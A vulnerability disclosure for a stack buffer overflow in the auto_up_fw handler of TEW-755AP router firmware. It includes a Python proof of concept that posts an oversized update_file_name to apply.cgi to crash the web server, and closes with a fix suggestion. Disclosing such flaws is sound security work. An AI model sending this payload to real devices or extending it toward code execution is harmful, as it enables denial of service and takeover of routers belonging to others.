We found a stack buffer overflow vulnerability at **TEW-755AP (**Firmware version TEW755AP-FW113B01.bin).

In the handler function for action auto_up_fw (sub_420A04) of the file /www/cgi/ssi, the value of update_file_name is directly copied to stack buffer v2 without size check. An attacker can specify update_file_name as a very long string in the post data and send the POST Request to apply.cgi to overflow the stack buffer, and finally can perform a Remote Code Execution attack.

PoC

import requests

url = "<http://192.168.17.221:80/apply.cgi>"
cookie = {"Cookie":"uid=1234"}
data = { 
    'action' : "auto_up_fw",
    "update_file_name" : "a" * 0x1000
}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)

We use python to send a crafted HTTP post request to the web server, and print out the return message.

Send the crafted HTTP request to the server, it will return 502 error code. This is because the stack buffer is overflowed by the input “aaaaaaaaaaaaaaaaaa…”. If it’s a malicious shellcode then the system will be controlled by the attacker.

Fix Suggestion:

Use snprintf to avoid buffer overflow